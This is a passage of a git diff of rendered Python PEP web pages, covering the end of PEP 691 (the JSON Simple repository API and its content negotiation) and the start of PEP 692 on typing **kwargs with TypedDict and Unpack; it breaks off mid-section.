This PEP does require that if the meta version latest is being used, the +server MUST respond with the content type for the actual version that is +contained in the response +(i.e. A Accept: application/vnd.pypi.simple.latest+json request that returns +a v1.x response should have a Content-Type of +application/vnd.pypi.simple.v1+json).

+

The Accept header is a comma separated list of content types that the client +understands and is able to process. It supports three different formats for each +content type that is being requested:

+
    +
  • $type/$subtype
  • +
  • $type/*
  • +
  • */*
  • +
+

For the use of selecting a version+format, the most useful of these is +$type/$subtype, as that is the only way to actually specify the version +and format you want.

+

The order of the content types listed in the Accept header does not have any +specific meaning, and the server SHOULD consider all of them to be equally +valid to respond with. If a client wishes to specify that they prefer a specific +content type over another, they may use the Accept header’s +quality value +syntax.

+

This allows a client to specify a priority for a specific entry in their +Accept header, by appending a ;q= followed by a value between 0 and +1 inclusive, with up to 3 decimal digits. When interpreting this value, +an entry with a higher quality has priority over an entry with a lower quality, +and any entry without a quality present will default to a quality of 1.

+

However, clients should keep in mind that a server is free to select any of +the content types they’ve asked for, regardless of their requested priority, and +it may even return a content type that they did not ask for.

+

To aid clients in determining the content type of the response that they have +received from an API request, this PEP requires that servers always include a +Content-Type header indicating the content type of the response. This is +technically a backwards incompatible change, however in practice +pip has been enforcing this requirement +so the risks for actual breakages is low.

+

An example of how a client can operate would look like:

+
import email.message
+import requests
+
+def parse_content_type(header: str) -> str:
+    m = email.message.Message()
+    m["content-type"] = header
+    return m.get_content_type()
+
+# Construct our list of acceptable content types, we want to prefer
+# that we get a v1 response serialized using JSON, however we also
+# can support a v1 response serialized using HTML. For compatibility
+# we also request text/html, but we prefer it least of all since we
+# don't know if it's actually a Simple API response, or just some
+# random HTML page that we've gotten due to a misconfiguration.
+CONTENT_TYPES = [
+    "application/vnd.pypi.simple.v1+json",
+    "application/vnd.pypi.simple.v1+html;q=0.2",
+    "text/html;q=0.01",  # For legacy compatibility
+]
+ACCEPT = ", ".join(CONTENT_TYPES)
+
+
+# Actually make our request to the API, requesting all of the content
+# types that we find acceptable, and letting the server select one of
+# them out of the list.
+resp = requests.get("https://pypi.org/simple/", headers={"Accept": ACCEPT})
+
+# If the server does not support any of the content types you requested,
+# AND it has chosen to return a HTTP 406 error instead of a default
+# response then this will raise an exception for the 406 error.
+resp.raise_for_status()
+
+
+# Determine what kind of response we've gotten to ensure that it is one
+# that we can support, and if it is, dispatch to a function that will
+# understand how to interpret that particular version+serialization. If
+# we don't understand the content type we've gotten, then we'll raise
+# an exception.
+content_type = parse_content_type(resp.headers.get("content-type", ""))
+match content_type:
+    case "application/vnd.pypi.simple.v1+json":
+        handle_v1_json(resp)
+    case "application/vnd.pypi.simple.v1+html" | "text/html":
+        handle_v1_html(resp)
+    case _:
+        raise Exception(f"Unknown content type: {content_type}")
+
+
+

If a client wishes to only support HTML or only support JSON, then they would +just remove the content types that they do not want from the Accept header, +and turn receiving them into an error.

+
+

Alternative Negotiation Mechanisms

+

While using HTTP’s Content negotiation is considered the standard way for a client +and server to coordinate to ensure that the client is getting an HTTP response that +it is able to understand, there are situations where that mechanism may not be +sufficient. For those cases this PEP has alternative negotiation mechanisms that +may optionally be used instead.

+
+
URL Parameter
+

Servers that implement the Simple API may choose to support an URL parameter named +format to allow the clients to request a specific version of the URL.

+

The value of the format parameter should be one of the valid content types. +Passing multiple content types, wild cards, quality values, etc… is not +supported.

+

Supporting this parameter is optional, and clients SHOULD NOT rely on it for +interacting with the API. This negotiation mechanism is intended to allow for easier +human based exploration of the API within a browser, or to allow documentation or +notes to link to a specific version+format.

+

Servers that do not support this parameter may choose to return an error when it is +present, or they may simple ignore its presence.

+

When a server does implement this parameter, it SHOULD take precedence over any +values in the client’s Accept header, and if the server does not support the +requested format, it may choose to fall back to the Accept header, or choose any +of the error conditions that standard server-driven content negotiation typically +has (e.g. 406 Not Available, 303 Multiple Choices, or selecting a default +type to return).

+
+
+
Endpoint Configuration
+

This option technically is not a special option at all, it is just a natural +consequence of using content negotiation and allowing servers to select which of the +available content types is their default.

+

If a server is unwilling or unable to implement the server-driven content negotiation, +and would instead rather require users to explicitly configure their client to select +the version they want, then that is a supported configuration.

+

To enable this, a server should make multiple endpoints (for instance, +/simple/v1+html/ and/or /simple/v1+json/) for each version+format that they +wish to support. Under that endpoint, they can host a copy of their repository that +only supports one (or a subset) of the content-types. When a client makes a request +using the Accept header, the server can ignore it and return the content type +that corresponds to that endpoint.

+

For clients that wish to require specific configuration, they can keep track of +which version+format a specific repository URL was configured for, and when making +a request to that server, emit an Accept header that only includes the correct +content type.

+
+
+
+
+

TUF Support - PEP 458

+

PEP 458 requires that all API responses are hashable and that they can be uniquely +identified by a path relative to the repository root. For a Simple API repository, the +target path is the Root of our API (e.g. /simple/ on PyPI). This creates +challenges when accessing the API using a TUF client instead of directly using a +standard HTTP client, as the TUF client cannot handle the fact that a target could +have multiple different representations that all hash differently.

+

PEP 458 does not specify what the target path should be for the Simple API, but +TUF requires that the target paths be “file-like”, in other words, a path like +simple/PROJECT/ is not acceptable, because it technically points to a +directory.

+

The saving grace is that the target path does not have to actually match the URL +being fetched from the Simple API, and it can just be a sigil that the fetching code +knows how to transform into the actual URL that needs to be fetched. This same thing +can hold true for other aspects of the actual HTTP request, such as the Accept +header.

+

Ultimately figuring out how to map a directory to a filename is out of scope for this +PEP (but it would be in scope for PEP 458), and this PEP defers making a decision +about how exactly to represent this inside of PEP 458 metadata.

+

However, it appears that the current WIP branch against pip that attempts to implement +PEP 458 is using a target path like simple/PROJECT/index.html. This could be +modified to include the API version and serialization format using something like +simple/PROJECT/vnd.pypi.simple.vN.FORMAT. So the v1 HTML format would be +simple/PROJECT/vnd.pypi.simple.v1.html and the v1 JSON format would be +simple/PROJECT/vnd.pypi.simple.v1.json.

+

In this case, since text/html is an alias to application/vnd.pypi.simple.v1+html +when interacting through TUF, it likely will make the most sense to normalize to the +more explicit name.

+

Likewise the latest metaversion should not be included in the targets, only +explicitly declared versions should be supported.

+
+
+
+

Recommendations

+

This section is non-normative, and represents what the PEP authors believe to be +the best default implementation decisions for something implementing this PEP, but +it does not represent any sort of requirement to match these decisions.

+

These decisions have been chosen to maximize the number of requests that can be +moved onto the newest version of an API, while maintaining the greatest amount +of compatibility. In addition, they’ve also tried to make using the API provide +guardrails that attempt to push clients into making the best choices it can.

+

It is recommended that servers:

+
    +
  • Support all 3 content types described in this PEP, using server-driven +content negotiation, for as long as they reasonably can, or at least as +long as they’re receiving non trivial traffic that uses the HTML responses.
  • +
  • When encountering an Accept header that does not contain any content types +that it knows how to work with, the server should not ever return a +300 Multiple Choice response, and instead return a 406 Not Acceptable +response.
      +
    • However, if choosing to use the endpoint configuration, you should prefer to +return a 200 OK response in the expected content type for that endpoint.
    • +
    +
  • +
  • When selecting an acceptable version, the server should choose the highest version +that the client supports, with the most expressive/featureful serialization format, +taking into account the specificity of the client requests as well as any +quality priority values they have expressed, and it should only use the +text/html content type as a last resort.
  • +
+

It is recommended that clients:

+
    +
  • Support all 3 content types described in this PEP, using server-driven +content negotiation, for as long as they reasonably can.
  • +
  • When constructing an Accept header, include all of the content types +that you support.

    You should generally not include a quality priority value for your content +types, unless you have implementation specific reasons that you want the +server to take into account (for example, if you’re using the standard library +HTML parser and you’re worried that there may be some kinds of HTML responses +that you’re unable to parse in some edge cases).

    +

    The one exception to this recommendation is that it is recommended that you +should include a ;q=0.01 value on the legacy text/html content type, +unless it is the only content type that you are requesting.

    +
  • +
  • Explicitly select what versions they are looking for, rather than using the +latest meta version during normal operation.
  • +
  • Check the Content-Type of the response and ensure it matches something +that you were expecting.
  • +
+
+
+

FAQ

+
+

Does this mean PyPI is planning to drop support for HTML/PEP 503?

+

No, PyPI has no plans at this time to drop support for PEP 503 or HTML +responses.

+

While this PEP does give repositories the flexibility to do that, that largely +exists to ensure that things like using the Endpoint Configuration mechanism is +able to work, and to ensure that clients do not make any assumptions that would +prevent, at some point in the future, gracefully dropping support for HTML.

+

The existing HTML responses incur almost no maintenance burden on PyPI and +there is no pressing need to remove them. The only real benefit to dropping them +would be to reduce the number of items cached in our CDN.

+

If in the future PyPI does wish to drop support for them, doing so would +almost certainly be the topic of a PEP, or at a minimum a public, open, discussion +and would be informed by metrics showing any impact to end users.

+
+
+

Why JSON instead of X format?

+

JSON parsers are widely available in most, if not every, language. A JSON +parser is also available in the Python standard library. It’s not the perfect +format, but it’s good enough.

+
+
+

Why not add X feature?

+

The general goal of this PEP is to change or add very little. We will instead focus +largely on translating the existing information contained within our HTML responses +into a sensible JSON representation. This will include PEP 658 metadata required +for packaging tooling.

+

The only real new capability that is added in this PEP is the ability to have +multiple hashes for a single file. That was done because the current mechanism being +limited to a single hash has made it painful in the past to migrate hashes +(md5 to sha256) and the cost of making the hashes a dictionary and allowing multiple +is pretty low.

+

The API was generally designed to allow further extension through adding new keys, +so if there’s some new piece of data that an installer might need, future PEPs can +easily make that available.

+
+
+

Why include the filename when the URL has it already?

+

We could reduce the size of our responses by removing the filename key and expecting +clients to pull that information out of the URL.

+

Currently this PEP chooses not to do that, largely because PEP 503 explicitly required +that the filename be available via the anchor tag of the links, though that was largely +because something had to be there. It’s not clear if repositories in the wild always +have a filename as the last part of the URL or if they’re relying on the filename in the +anchor tag.

+

It also makes the responses slightly nicer to read for a human, as you get a nice short +unique identifier.

+

If we got reasonable confidence that mandating the filename is in the URL, then we could +drop this data and reduce the size of the JSON response.

+
+
+

Why not break out other pieces of information from the filename?

+

Currently clients are expected to parse a number of pieces of information from the +filename such as project name, version, ABI tags, etc. We could break these out +and add them as keys to the file object.

+

This PEP has chosen not to do that because doing so would increase the size of the +API responses, and most clients are going to require the ability to parse that +information out of file names anyways regardless of what the API does. Thus it makes +sense to keep that functionality inside of the clients.

+
+
+

Why Content Negotiation instead of multiple URLs?

+

Another reasonable way to implement this would be to duplicate the API routes and +include some marker in the URL itself for JSON. Such as making the URLs be something +like /simple/foo.json, /simple/_index.json, etc.

+

This makes some things simpler like TUF integration and fully static serving of a +repository (since .json files can just be written out).

+

However, this is two pretty major issues:

+
    +
  • Our current URL structure relies on the fact that there is an URL that represents +the “root”, / to serve the list of projects. If we want to have separate URLs +for JSON and HTML, we would need to come up with some way to have two root URLs.

    Something like / being HTML and /_index.json being JSON, since _index +isn’t a valid project name could work. But / being HTML doesn’t work great if +a repository wants to remove support for HTML.

    +

    Another option could be moving all of the existing HTML URLs under a namespace while +making a new namespace for JSON. Since /<project>/ was defined, we would have to +make these namespaces not valid project names, so something like /_html/ and +/_json/ could work, then just redirect the non namespaced URLs to whatever the +“default” for that repository is (likely HTML, unless they’ve disabled HTML then JSON).

    +
  • +
  • With separate URLs, there’s no good way to support zero configuration discovery +that a repository supports the JSON URLs without making additional HTTP requests to +determine if the JSON URL exists or not.

    The most naive implementation of this would be to request the JSON URL and fall back +to the HTML URL for every single request, but that would be horribly performant +and violate the goal of minimal additional HTTP requests.

    +

    The most likely implementation of this would be to make some sort of repository level +configuration file that somehow indicates what is supported. We would have the same +namespace problem as above, with the same solution, something like /_config.json +or so could hold that data, and a client could first make an HTTP request to that, +and if it exists pull it down and parse it to learn about the capabilities of this +particular repository.

    +
  • +
  • The use of Accept also allows us to add versioning into this field
  • +
+

All being said, it is the opinion of this PEP that those three issues combined make +using separate API routes a less desirable solution than relying on content +negotiation to select the most ideal representation of the data.

+
+
+

Does this mean that static servers are no longer supported?

+

In short, no, static servers are still (almost) fully supported by this PEP.

+

The specifics of how they are supported will depend on the static server in +question. For example:

+
    +
  • S3: S3 fully supports custom content types, however it does not support +any form of content negotiation. In order to have a server hosted on S3, you +would have to use the “Endpoint configuration” style of negotiation, and +users would have to configure their clients explicitly.
  • +
  • GitHub Pages: GitHub pages does not support custom content types, so the +S3 solution is not currently workable, which means that only text/html +repositories would function.
  • +
  • Apache: Apache fully supports server-driven content negotiation, and would +just need to be configured to map the custom content types to specific extension.
  • +
+
+
+

Why not add an application/json alias like text/html?

+

This PEP believes that it is best for both clients and servers to be explicit +about the types of the API responses that are being used, and a content type +like application/json is the exact opposite of explicit.

+

The existence of the text/html alias exists as a compromise primarily to +ensure that existing consumers of the API continue to function as they already +do. There is no such expectation of existing clients using the Simple API with +a application/json content type.

+

In addition, application/json has no versioning in it, which means that +if there is ever a 2.x version of the Simple API, we will be forced to make +a decision. Should application/json preserve backwards compatibility and +continue to be an alias for application/vnd.pypi.simple.v1+json, or should +it be updated to be an alias for application/vnd.pypi.simple.v2+json?

+

This problem doesn’t exist for text/html, because the assumption is that +HTML will remain a legacy format, and will likely not gain any new features, +much less features that require breaking compatibility. So having it be an +alias for application/vnd.pypi.simple.v1+html is effectively the same as +having it be an alias for application/vnd.pypi.simple.latest+html, since +1.x will likely be the only HTML version to exist.

+

The largest benefit to adding the application/json content type is that +there do things that do not allow you to have custom content types, and require +you to select one of their preset content types. The main example of this being +GitHub Pages, which the lack of application/json support in this PEP means +that static repositories will no longer be able to be hosted on GitHub Pages +unless GitHub adds the application/vnd.pypi.simple.v1+json content type.

+

This PEP believes that the benefits are not large enough to add that content +type alias at this time, and that its inclusion would likely be a footgun +waiting for unsuspecting people to accidentally pick it up. Especially given +that we can always add it in the future, but removing things is a lot harder +to do.

+
+
+

Why add a application/vnd.pypi.simple.v1+html?

+

The PEP expects the HTML version of the API to become legacy, so one option it +could take is not add the application/vnd.pypi.simple.v1+html content type, +and just use text/html for that.

+

This PEP has decided that adding the new content type is better overall, since it +makes even the legacy format more self describing and makes them both more consistent +with each other. Overall I think it’s more confusing if the +html version doesn’t +exist.

+
+
+

Why v1.0 and not v1.1 or v2.0?

+

This PEP is still wholly backwards compatible with clients that could read the +existing v1.0 API, can still continue to read the API after these changes have +been made. In PEP 629, the qualification for a major version bump is:

+
+
Incrementing the major version is used to signal a backwards incompatible +change such that existing clients would no longer be expected to be able to +meaningfully use the API.
+

The changes in this PEP do not meet that bar, nothing has changed in a way that +existing clients would no longer be expected to be able to meaningfully use the +API.

+

That means we should still be within the v1.x version line.

+

The question of whether we should be v1.1 or v1.0 is a more interesting one, and +there are a few ways of looking at it:

+
    +
  • We’ve exposed new features to the API (the project name on the project +page, multiple hashes), which is a sign that we should increment the minor +version.
  • +
  • The new features exist wholly within the JSON serialization, which means that +no client that currently is requesting the HTML 1.0 page, would ever see any +of the new features anyways, so for them it is effectively still v1.0.
  • +
  • No major client has implemented support for PEP 629 yet, which means that the +minor version numbering is largely academic at this point anyways, since it +exists to let clients provide feedback to end users.
  • +
+

The second and third points above end up making the first point kind of +meaningless, and with that, it makes more sense to just call everything v1.0 +and be stricter about updating versions into the future.

+
+
+
+

Appendix 1: Survey of use cases to cover

+

This was done through a discussion between pip, PyPI, and bandersnarch +maintainers, who are the two first potential users for the new API. This is +how they use the Simple + JSON APIs today or how they currently plan to use it:

+
    +
  • pip:
      +
    • List of all files for a particular release
    • +
    • Metadata of each individual artifact:
        +
      • was it yanked? (data-yanked)
      • +
      • what’s the python-requires? (data-python-requires)
      • +
      • what’s the hash of this file? (currently, hash in URL)
      • +
      • Full metadata (data-dist-info-metadata)
      • +
      • [Bonus] what are the declared dependencies, if available (list-of-strings, null if unavailable)?
      • +
      +
    • +
    +
  • +
  • bandersnatch - Only uses legacy JSON API + XMLRPC today:
      +
    • Generates Simple HTML rather than copying from PyPI
        +
      • Maybe this changes with the new API and we verbatim pull these API assets from PyPI
      • +
      +
    • +
    • List of all files for a particular release.
        +
      • Workout URL for release files to download
      • +
      +
    • +
    • Metadata of each individual artifact.
        +
      • Write out the JSON to mirror storage today (disk/S3)
          +
        • Required metadata used +(via Package class):
            +
          • metadata["info"]
          • +
          • metadata["last_serial"]
          • +
          • metadata["releases"]
              +
            • digests
            • +
            • URL
            • +
            +
          • +
          +
        • +
        +
      • +
      +
    • +
    • XML-RPC calls (we’d love to deprecate - but we don’t think should go in the Simple API)
        +
      • [Bonus] Get packages since serial X (or all)
          +
        • XML-RPC Call: changelog_since_serial
        • +
        +
      • +
      • [Bonus] Get all packages with serial
          +
        • XML-RPC Call: list_packages_with_serial
        • +
        +
      • +
      +
    • +
    +
  • +
+
+
+

Appendix 2: Rough Underlying Data Models

+

These are not intended to perfectly match the server, client, or wire +formats. Rather, these are conceptual models, put to code to make them +more explicit as to the abstract models underlining the repository API +as it evolved through PEP 503, PEP 592, PEP 629, PEP 658, +and now this PEP, PEP 691.

+

The existing HTML, and the new JSON serialization of these models then +represent how these underlying conceptual models get mapped onto the +actual wire formats.

+

How servers or clients choose to model this data is out of scope for +this PEP.

+
@dataclass
+class Meta:
+    api_version: Literal["1.0"]
+
+
+@dataclass
+class Project:
+    # Normalized or Non-Normalized Name
+    name: str
+    # Computed in JSON, Included in HTML
+    url: str | None
+
+
+@dataclass
+class File:
+    filename: str
+    url: str
+    # Limited to a len() of 1 in HTML
+    hashes: dict[str, str]
+    gpg_sig: bool | None
+    requires_python: str | None
+
+
+@dataclass
+class PEP592File(File):
+    yanked: bool | str
+
+@dataclass
+class PEP658File(PEP592File):
+    # Limited to a len() of 1 in HTML
+    dist_info_metadata: bool | dict[str, str]
+
+
+# Simple Index page (/simple/)
+@dataclass
+class PEP503_Index:
+    projects: set[Project]
+
+
+@dataclass
+class PEP629_Index(PEP503_Index):
+    meta: Meta
+
+
+@dataclass
+class Index(PEP629_Index):
+    pass
+
+
+# Simple Detail page (/simple/$PROJECT/)
+@dataclass
+class PEP503_Detail:
+    files: set[File]
+
+
+@dataclass
+class PEP592_Detail(PEP503_Detail):
+    files: set[PEP592File]
+
+
+@dataclass
+class PEP629_Detail(PEP592_Detail):
+    meta: Meta
+
+
+@dataclass
+class PEP658_Detail(PEP629_Detail):
+  files: set[PEP658File]
+
+
+@dataclass
+class PEP691_Detail(PEP658_Detail):
+    name: str  # Normalized Name
+
+
+@dataclass
+class Detail(PEP691_Detail):
+    pass
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0691.rst

+

Last modified: 2024-10-31 07:02:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0692/index.html b/pep-0692/index.html new file mode 100644 index 00000000000..0f86a5aced3 --- /dev/null +++ b/pep-0692/index.html @@ -0,0 +1,698 @@ + + + + + + + + PEP 692 – Using TypedDict for more precise **kwargs typing | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 692 – Using TypedDict for more precise **kwargs typing

+
+
Author:
+
Franek Magiera <framagie at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
29-May-2022
+
Python-Version:
+
3.12
+
Post-History:
+
29-May-2022, +12-Jul-2022, +12-Jul-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Unpack for keyword arguments for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

Currently **kwargs can be type hinted as long as all of the keyword +arguments specified by them are of the same type. However, that behaviour can +be very limiting. Therefore, in this PEP we propose a new way to enable more +precise **kwargs typing. The new approach revolves around using +TypedDict to type **kwargs that comprise keyword arguments of different +types.

+
+
+

Motivation

+

Currently annotating **kwargs with a type T means that the kwargs +type is in fact dict[str, T]. For example:

+
def foo(**kwargs: str) -> None: ...
+
+
+

means that all keyword arguments in foo are strings (i.e., kwargs is +of type dict[str, str]). This behaviour limits the ability to type +annotate **kwargs only to the cases where all of them are of the same type. +However, it is often the case that keyword arguments conveyed by **kwargs +have different types that are dependent on the keyword’s name. In those cases +type annotating **kwargs is not possible. This is especially a problem for +already existing codebases where the need of refactoring the code in order to +introduce proper type annotations may be considered not worth the effort. This +in turn prevents the project from getting all of the benefits that type hinting +can provide.

+

Moreover, **kwargs can be used to reduce the amount of code needed in +cases when there is a top-level function that is a part of a public API and it +calls a bunch of helper functions, all of which expect the same keyword +arguments. Unfortunately, if those helper functions were to use **kwargs, +there is no way to properly type hint them if the keyword arguments they expect +are of different types. In addition, even if the keyword arguments are of the +same type, there is no way to check whether the function is being called with +keyword names that it actually expects.

+

As described in the Intended Usage section, +using **kwargs is not always the best tool for the job. Despite that, it is +still a widely used pattern. As a consequence, there has been a lot of +discussion around supporting more precise **kwargs typing and it became a +feature that would be valuable for a large part of the Python community. This +is best illustrated by the mypy GitHub issue 4441 which +contains a lot of real world cases that could benefit from this propsal.

+

One more use case worth mentioning for which **kwargs are also convenient, +is when a function should accommodate optional keyword-only arguments that +don’t have default values. A need for a pattern like that can arise when values +that are usually used as defaults to indicate no user input, such as None, +can be passed in by a user and should result in a valid, non-default behavior. +For example, this issue came up in the popular httpx library.

+
+
+

Rationale

+

PEP 589 introduced the TypedDict type constructor that supports dictionary +types consisting of string keys and values of potentially different types. A +function’s keyword arguments represented by a formal parameter that begins with +double asterisk, such as **kwargs, are received as a dictionary. +Additionally, such functions are often called using unpacked dictionaries to +provide keyword arguments. This makes TypedDict a perfect candidate to be +used for more precise **kwargs typing. In addition, with TypedDict +keyword names can be taken into account during static type analysis. However, +specifying **kwargs type with a TypedDict means, as mentioned earlier, +that each keyword argument specified by **kwargs is a TypedDict itself. +For instance:

+
class Movie(TypedDict):
+    name: str
+    year: int
+
+def foo(**kwargs: Movie) -> None: ...
+
+
+

means that each keyword argument in foo is itself a Movie dictionary +that has a name key with a string type value and a year key with an +integer type value. Therefore, in order to support specifying kwargs type +as a TypedDict without breaking current behaviour, a new construct has to +be introduced.

+

To support this use case, we propose reusing Unpack which +was initially introduced in PEP 646. There are several reasons for doing so:

+
    +
  • Its name is quite suitable and intuitive for the **kwargs typing use case +as our intention is to “unpack” the keywords arguments from the supplied +TypedDict.
  • +
  • The current way of typing *args would be extended to **kwargs +and those are supposed to behave similarly.
  • +
  • There would be no need to introduce any new special forms.
  • +
  • The use of Unpack for the purposes described in this PEP does not +interfere with the use cases described in PEP 646.
  • +
+
+
+

Specification

+

With Unpack we introduce a new way of annotating **kwargs. +Continuing the previous example:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...
+
+
+

would mean that the **kwargs comprise two keyword arguments specified by +Movie (i.e. a name keyword of type str and a year keyword of +type int). This indicates that the function should be called as follows:

+
kwargs: Movie = {"name": "Life of Brian", "year": 1979}
+
+foo(**kwargs)                               # OK!
+foo(name="The Meaning of Life", year=1983)  # OK!
+
+
+

When Unpack is used, type checkers treat kwargs inside the +function body as a TypedDict:

+
def foo(**kwargs: Unpack[Movie]) -> None:
+    assert_type(kwargs, Movie)  # OK!
+
+
+

Using the new annotation will not have any runtime effect - it should only be +taken into account by type checkers. Any mention of errors in the following +sections relates to type checker errors.

+
+

Function calls with standard dictionaries

+

Passing a dictionary of type dict[str, object] as a **kwargs argument +to a function that has **kwargs annotated with Unpack must generate a +type checker error. On the other hand, the behaviour for functions using +standard, untyped dictionaries can depend on the type checker. For example:

+
def foo(**kwargs: Unpack[Movie]) -> None: ...
+
+movie: dict[str, object] = {"name": "Life of Brian", "year": 1979}
+foo(**movie)  # WRONG! Movie is of type dict[str, object]
+
+typed_movie: Movie = {"name": "The Meaning of Life", "year": 1983}
+foo(**typed_movie)  # OK!
+
+another_movie = {"name": "Life of Brian", "year": 1979}
+foo(**another_movie)  # Depends on the type checker.
+
+
+
+
+

Keyword collisions

+

A TypedDict that is used to type **kwargs could potentially contain +keys that are already defined in the function’s signature. If the duplicate +name is a standard parameter, an error should be reported by type checkers. +If the duplicate name is a positional-only parameter, no errors should be +generated. For example:

+
def foo(name, **kwargs: Unpack[Movie]) -> None: ...     # WRONG! "name" will
+                                                        # always bind to the
+                                                        # first parameter.
+
+def foo(name, /, **kwargs: Unpack[Movie]) -> None: ...  # OK! "name" is a
+                                                        # positional-only parameter,
+                                                        # so **kwargs can contain
+                                                        # a "name" keyword.
+
+
+
+
+

Required and non-required keys

+

By default all keys in a TypedDict are required. This behaviour can be +overridden by setting the dictionary’s total parameter as False. +Moreover, PEP 655 introduced new type qualifiers - typing.Required and +typing.NotRequired - that enable specifying whether a particular key is +required or not:

+
class Movie(TypedDict):
+    title: str
+    year: NotRequired[int]
+
+
+

When using a TypedDict to type **kwargs all of the required and +non-required keys should correspond to required and non-required function +keyword parameters. Therefore, if a required key is not supported by the +caller, then an error must be reported by type checkers.

+
+
+

Assignment

+

Assignments of a function typed with **kwargs: Unpack[Movie] and +another callable type should pass type checking only if they are compatible. +This can happen for the scenarios described below.

+
+

Source and destination contain **kwargs

+

Both destination and source functions have a **kwargs: Unpack[TypedDict] +parameter and the destination function’s TypedDict is assignable to the +source function’s TypedDict and the rest of the parameters are +compatible:

+
class Animal(TypedDict):
+    name: str
+
+class Dog(Animal):
+    breed: str
+
+def accept_animal(**kwargs: Unpack[Animal]): ...
+def accept_dog(**kwargs: Unpack[Dog]): ...
+
+accept_dog = accept_animal  # OK! Expression of type Dog can be
+                            # assigned to a variable of type Animal.
+
+accept_animal = accept_dog  # WRONG! Expression of type Animal
+                            # cannot be assigned to a variable of type Dog.
+
+
+
+
+

Source contains **kwargs and destination doesn’t

+

The destination callable doesn’t contain **kwargs, the source callable +contains **kwargs: Unpack[TypedDict] and the destination function’s keyword +arguments are assignable to the corresponding keys in source function’s +TypedDict. Moreover, not required keys should correspond to optional +function arguments, whereas required keys should correspond to required +function arguments. Again, the rest of the parameters have to be compatible. +Continuing the previous example:

+
class Example(TypedDict):
+    animal: Animal
+    string: str
+    number: NotRequired[int]
+
+def src(**kwargs: Unpack[Example]): ...
+def dest(*, animal: Dog, string: str, number: int = ...): ...
+
+dest = src  # OK!
+
+
+

It is worth pointing out that the destination function’s parameters that are to +be compatible with the keys and values from the TypedDict must be keyword +only:

+
def dest(dog: Dog, string: str, number: int = ...): ...
+
+dog: Dog = {"name": "Daisy", "breed": "labrador"}
+
+dest(dog, "some string")  # OK!
+
+dest = src                # Type checker error!
+dest(dog, "some string")  # The same call fails at
+                          # runtime now because 'src' expects
+                          # keyword arguments.
+
+
+

The reverse situation where the destination callable contains +**kwargs: Unpack[TypedDict] and the source callable doesn’t contain +**kwargs should be disallowed. This is because, we cannot be sure that +additional keyword arguments are not being passed in when an instance of a +subclass had been assigned to a variable with a base class type and then +unpacked in the destination callable invocation:

+
def dest(**kwargs: Unpack[Animal]): ...
+def src(name: str): ...
+
+dog: Dog = {"name": "Daisy", "breed": "Labrador"}
+animal: Animal = dog
+
+dest = src      # WRONG!
+dest(**animal)  # Fails at runtime.
+
+
+

Similar situation can happen even without inheritance as compatibility +between TypedDicts is based on structural subtyping.

+
+
+

Source contains untyped **kwargs

+

The destination callable contains **kwargs: Unpack[TypedDict] and the +source callable contains untyped **kwargs:

+
def src(**kwargs): ...
+def dest(**kwargs: Unpack[Movie]): ...
+
+dest = src  # OK!
+
+
+
+
+

Source contains traditionally typed **kwargs: T

+

The destination callable contains **kwargs: Unpack[TypedDict], the source +callable contains traditionally typed **kwargs: T and each of the +destination function TypedDict’s fields is assignable to a variable of +type T:

+
class Vehicle:
+    ...
+
+class Car(Vehicle):
+    ...
+
+class Motorcycle(Vehicle):
+    ...
+
+class Vehicles(TypedDict):
+    car: Car
+    moto: Motorcycle
+
+def dest(**kwargs: Unpack[Vehicles]): ...
+def src(**kwargs: Vehicle): ...
+
+dest = src  # OK!
+
+
+

On the other hand, if the destination callable contains either untyped or +traditionally typed **kwargs: T and the source callable is typed using +**kwargs: Unpack[TypedDict] then an error should be generated, because +traditionally typed **kwargs aren’t checked for keyword names.

+

To summarize, function parameters should behave contravariantly and function +return types should behave covariantly.

+
+
+
+

Passing kwargs inside a function to another function

+

A previous point +mentions the problem of possibly passing additional keyword arguments by +assigning a subclass instance to a variable that has a base class type. Let’s +consider the following example:

+
class Animal(TypedDict):
+    name: str
+
+class Dog(Animal):
+    breed: str
+
+def takes_name(name: str): ...
+
+dog: Dog = {"name": "Daisy", "breed": "Labrador"}
+animal: Animal = dog
+
+def foo(**kwargs: Unpack[Animal]):
+    print(kwargs["name"].capitalize())
+
+def bar(**kwargs: Unpack[Animal]):
+    takes_name(**kwargs)
+
+def baz(animal: Animal):
+    takes_name(**animal)
+
+def spam(**kwargs: Unpack[Animal]):
+    baz(kwargs)
+
+foo(**animal)   # OK! foo only expects and uses keywords of 'Animal'.
+
+bar(**animal)   # WRONG! This will fail at runtime because 'breed' keyword
+                # will be passed to 'takes_name' as well.
+
+spam(**animal)  # WRONG! Again, 'breed' keyword will be eventually passed
+                # to 'takes_name'.
+
+
+

In the example above, the call to foo will not cause any issues at +runtime. Even though foo expects kwargs of type Animal it doesn’t +matter if it receives additional arguments because it only reads and uses what +it needs completely ignoring any additional values.

+

The calls to bar and spam will fail because an unexpected keyword +argument will be passed to the takes_name function.

+

Therefore, kwargs hinted with an unpacked TypedDict can only be passed +to another function if the function to which unpacked kwargs are being passed +to has **kwargs in its signature as well, because then additional keywords +would not cause errors at runtime during function invocation. Otherwise, the +type checker should generate an error.

+

In cases similar to the bar function above the problem could be worked +around by explicitly dereferencing desired fields and using them as arguments +to perform the function call:

+
def bar(**kwargs: Unpack[Animal]):
+    name = kwargs["name"]
+    takes_name(name)
+
+
+
+
+

Using Unpack with types other than TypedDict

+

As described in the Rationale section, +TypedDict is the most natural candidate for typing **kwargs. +Therefore, in the context of typing **kwargs, using Unpack with types +other than TypedDict should not be allowed and type checkers should +generate errors in such cases.

+
+
+

Changes to Unpack

+

Currently using Unpack in the context of +typing is interchangeable with using the asterisk syntax:

+
>>> Unpack[Movie]
+*<class '__main__.Movie'>
+
+
+

